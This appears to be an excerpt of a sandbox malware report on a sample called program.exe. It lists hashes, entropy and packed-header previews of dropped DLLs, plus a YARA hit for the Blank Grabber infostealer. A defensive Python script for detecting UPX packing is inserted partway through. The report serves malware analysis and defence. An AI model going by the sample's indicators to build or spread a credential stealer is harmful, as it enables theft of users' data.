                                                                                                                                                                                                                                             • Filename: active.exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: Creal.exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: , Detection: malicious
                                                                                                                                                                                                                                             • Filename: B6EGeOHEFm.exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: Q60ZbERXWZ.exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: XCubQJqiz7.exe, Detection: malicious
                                                                                                                                                                                                                                             • Filename: MVPloader.exe, Detection: malicious
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49424
                                                                                                                                                                                                                                            Entropy (8bit):7.815740675307968
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
                                                                                                                                                                                                                                            MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
                                                                                                                                                                                                                                            SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
                                                                                                                                                                                                                                            SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
                                                                                                                                                                                                                                            SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                             • Antivirus: Virustotal, Detection: 1%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                                                            Entropy (8bit):7.834005148796091
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
                                                                                                                                                                                                                                            MD5:79879C679A12FAC03F472463BB8CEFF7
                                                                                                                                                                                                                                            SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
                                                                                                                                                                                                                                            SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
                                                                                                                                                                                                                                            SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):120080
                                                                                                                                                                                                                                            Entropy (8bit):7.901857200989369
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
                                                                                                                                                                                                                                            MD5:21D27C95493C701DFF0206FF5F03941D
                                                                                                                                                                                                                                            SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
                                                                                                                                                                                                                                            SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
                                                                                                                                                                                                                                            SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36112
                                                                                                                                                                                                                                            Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                                            MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                                            SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                                            SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                                            SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):88336
                                                                                                                                                                                                                                            Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                                            MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                                            SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                                            SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                                            SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
Process:C:\Users\user\Desktop\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):27408
Entropy (8bit):7.449801379195215
Encrypted:false
SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
MD5:513DCE65C09B3ABC516687F99A6971D8
SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):45328
Entropy (8bit):7.729647917060796
Encrypted:false
SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):60176
Entropy (8bit):7.847943448203495
Encrypted:false
SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
MD5:8CD40257514A16060D5D882788855B55
SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):68368
Entropy (8bit):7.86108869046165
Encrypted:false
SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
MD5:7EF27CD65635DFBA6076771B46C1B99F
SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
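Every x86-64 DLL dropped above carries UPX0/UPX1 section names, a "4.02 ... UPX!" packer record in its header preview, and an 8-bit entropy between 7.4 and 7.9, yet each scores 0% on the listed scanner. A triage script that reads those same three signals off a file (section names from the PE section table, the UPX! magic, and the entropy figure the report prints as "Entropy (8bit)") is the check an analyst would want before deciding whether to unpack. The code below is an added example, not Joe Sandbox tooling or part of the sample; it parses the PE headers by hand with the standard library only, and the bytes it runs on are a constructed fixture whose layout mirrors the previews, not the dropped files themselves. The UPX version 4.02 is inferred only from the "4.02.UPX!" string visible in the previews.

```python
"""Triage helper for dropped PE files: parse the section table, look for the
UPX packer's section names and pack-header magic, and compute the same 8-bit
entropy a sandbox reports. Standard library only; runs offline."""
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0), the quantity shown as
    "Entropy (8bit)" in the report. Empty input yields 0.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list:
    """Return the section names of a PE image in table order, or [] when the
    buffer is not an MZ/PE layout. Only the fields needed are parsed, so a
    truncated file (as a 1 KB preview would be) is handled without raising."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size             # IMAGE_SECTION_HEADER[]
    names = []
    for i in range(num_sections):
        off = table + i * 40
        if off + 40 > len(data):
            break                            # truncated section table
        raw = data[off:off + 8].rstrip(b"\0")
        names.append(raw.decode("ascii", "replace"))
    return names


def upx_triage(data: bytes) -> dict:
    """Packer indicators for one file. 'upx_sections' is the strongest signal;
    'upx_magic' catches the UPX! pack header even when sections were renamed;
    'high_entropy' (>= 7.0) alone is only a hint, since compressed resources
    and encrypted blobs score the same as packed code."""
    names = pe_section_names(data)
    ent = shannon_entropy(data)
    return {
        "section_names": names,
        "upx_sections": any(n.startswith("UPX") for n in names),
        "upx_magic": b"UPX!" in data,
        "entropy": round(ent, 3),
        "high_entropy": ent >= 7.0,
    }


def build_fixture(section_names, trailer=b"") -> bytes:
    """Constructed, non-executable PE32+ header (a test fixture, not one of
    the dropped files) with the given section names, so the parser can be
    exercised offline."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xF0                          # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0,
                       opt_size, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)
    secs = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32
                    for n in section_names)
    return dos + b"PE\0\0" + coff + opt + secs + trailer


# Mirrors the header layout visible in the previews: UPX0/UPX1/.rsrc followed
# by the packer's "4.02 ... UPX!" record. Bytes are constructed, not sampled.
PACKED = build_fixture(["UPX0", "UPX1", ".rsrc"],
                       b"4.02\0UPX!" + bytes(range(256)) * 4)
CLEAN = build_fixture([".text", ".rdata", ".data"], b"\0" * 1024)

if __name__ == "__main__":
    for label, blob in (("packed", PACKED), ("clean", CLEAN)):
        print(label, upx_triage(blob))
```

Run it against a real dropped file with `upx_triage(open(path, "rb").read())`. Treat `upx_sections` or `upx_magic` as the trigger to unpack (`upx -d` works on unmodified UPX output; a failure there usually means a modified packer stub) and only then hash and scan the result; the 0% verdicts above are on the packed bytes, so the unpacked image is what detection and YARA should be run on.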
Process:C:\Users\user\Desktop\program.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1394456
Entropy (8bit):5.531698507573688
Encrypted:false
SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:A9CBD0455B46C7D14194D1F18CA8719E
SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:false
Reputation:unknown
Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
Process:C:\Users\user\Desktop\program.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):113874
Entropy (8bit):7.73370490411063
Encrypted:false
SSDEEP:1536:492Wl7KxFTXlh+5dF3e2A8QN8A0EuqUkrVrrib26s/CGGzuskhz2WawfooIMR2jV:AKxJi5dFO2A8BS9ss/CbzTUKWSxqcf
MD5:7FC09043BE2028C6D91488E29ACDC4D0
SHA1:B3C8537899831477155252A89F5E8373433C0130
SHA-256:5AF489AF3E1F305D479D57D6EBBD9508E0BA6A537B9814A637D4303CDE4A70D4
SHA-512:6442D8EE116FE4ECAEAA807C861A98AF1D84D0498D646867AA221B2DAF157D8F0CDB9FA3114666BCE2BD37B01660561BAC00798835BDF51846E6C9C4C141C820
Malicious:false
Reputation:unknown
Preview:PK........AbXY+Z..\...\.......stub-o.pyc...........g+ .............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
Process:C:\Users\user\Desktop\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1630488
Entropy (8bit):7.952879310777133
Encrypted:false
SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:8377FE5949527DD7BE7B827CB1FFD324
SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):29968
                                                                                                                                                                                                                                            Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                            MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                            SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                            SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                            SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):227096
                                                                                                                                                                                                                                            Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                            MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                            SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                            SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                            SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1850640
                                                                                                                                                                                                                                            Entropy (8bit):7.994061638516346
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
                                                                                                                                                                                                                                            MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
                                                                                                                                                                                                                                            SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
                                                                                                                                                                                                                                            SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
                                                                                                                                                                                                                                            SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:unknown
